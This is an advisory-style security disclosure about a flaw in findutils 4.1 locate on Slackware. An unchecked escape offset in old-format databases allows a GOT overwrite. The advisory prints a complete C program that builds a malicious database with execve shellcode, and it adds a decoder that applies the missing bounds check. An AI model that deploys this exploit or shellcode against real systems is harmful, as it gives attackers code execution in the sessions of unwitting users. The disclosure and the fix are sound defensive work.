COMMAND

    /usr/bin/locate (findutils-4.1 and before)

SYSTEMS AFFECTED

    Slackware 8.0, Slackware 7.1

PROBLEM

    Josh Smith, lockdown and zen-parse found the following.  In Slackware,
    and possibly other distributions, it is possible to modify the locate
    database if one were to obtain UID nobody.  This allows locate to act
    as a sort of 'trojan': anyone who executes it unknowingly executes
    potentially malicious code.

    It works by taking advantage of the fact that locate accepts old-format
    databases.  LOCATEDB_OLD_ESCAPE (char 30) is followed by an offset,
    stored in a signed integer, giving how many characters to add to the
    current character pointer in the path.  locate does not perform any
    sanity checking of this value.  This exploit tells it to move the
    pointer back a long way, past the beginning of the string, all the way
    to the GOT address for exit(), which then gets the address of the
    shellcode added; the program then runs out of database and executes
    our code.

    #include <stdio.h>
    
    char shellcode[] =
       "\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46"
       "\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80"
       "\xe8\xe3\xff\xff\xff/tmp/xx";
    char putshell[] =
       "\x14\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c"
       "\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96";
    
    int main(void)
    {
       int i;
       int z0=0; int addr=0x0804a970;
       int z1=0; int addr2=-626;
       int z2=0; int addr3=addr+6;
       printf("%s", &addr);
       printf("%s", &addr3);
       printf("%s",shellcode);
       fflush(stdout);
       for(i=46;i<256;i++) putchar('A');
       printf("%s", putshell);
       fflush(stdout);
       putchar(0);
       putchar(30);
       printf("%s", &addr2);
       printf("\x82\x83");
       fflush(stdout);
    }
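    The following is an added example, not code from findutils or from the
    advisory: a decoder for the old-format record header described above
    that applies the bounds check locate lacks, rejecting any escape offset
    that would move the write position before the start or past the end of
    the current path.  It assumes the one-byte count is biased by a
    LOCATEDB_OLD_OFFSET of 14 and that the escaped count is a native 4-byte
    int as read by getw(); bigram expansion is left out.

```c
#include <string.h>
#include <stdint.h>

#define OLD_ESCAPE 30  /* LOCATEDB_OLD_ESCAPE: header byte announcing a 4-byte count */
#define OLD_OFFSET 14  /* LOCATEDB_OLD_OFFSET: bias on the 1-byte count (assumed value) */

struct oldstate {
    char path[256];    /* path reconstructed so far */
    long count;        /* running shared-prefix length carried between records */
};

/* Decode one old-format record from rec[0..reclen).  Returns the number of
   bytes consumed (the byte that ends the path starts the next record and is
   not consumed), or -1 if the record is malformed or would move the write
   position outside st->path.  State is updated only on success. */
static int decode_old_record(const unsigned char *rec, size_t reclen,
                             struct oldstate *st)
{
    size_t i, pos, len = strlen(st->path);
    long count = st->count;
    char tmp[sizeof st->path];

    if (reclen == 0) return -1;
    if (rec[0] == OLD_ESCAPE) {
        int32_t delta;                /* locate 4.1 read this with getw() */
        if (reclen < 1 + sizeof delta) return -1;
        memcpy(&delta, rec + 1, sizeof delta);
        count += (long)delta - OLD_OFFSET;
        i = 1 + sizeof delta;
    } else {
        count += (long)rec[0] - OLD_OFFSET;
        i = 1;
    }
    /* The sanity check the advisory says is missing: the prefix length must
       land inside the current path, never before its start or past its end. */
    if (count < 0 || (size_t)count > len) return -1;

    memcpy(tmp, st->path, len);
    pos = (size_t)count;
    while (i < reclen && rec[i] > OLD_ESCAPE) {
        if (rec[i] >= 0x80) return -1;          /* bigram code: not expanded here */
        if (pos + 1 >= sizeof tmp) return -1;   /* keep room for the NUL */
        tmp[pos++] = (char)rec[i++];
    }
    tmp[pos] = '\0';
    memcpy(st->path, tmp, pos + 1);
    st->count = count;
    return (int)i;
}
```

    A record carrying a large negative escape offset, like the one the
    exploit emits, is refused before any byte is written.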

SOLUTION

    Nothing yet.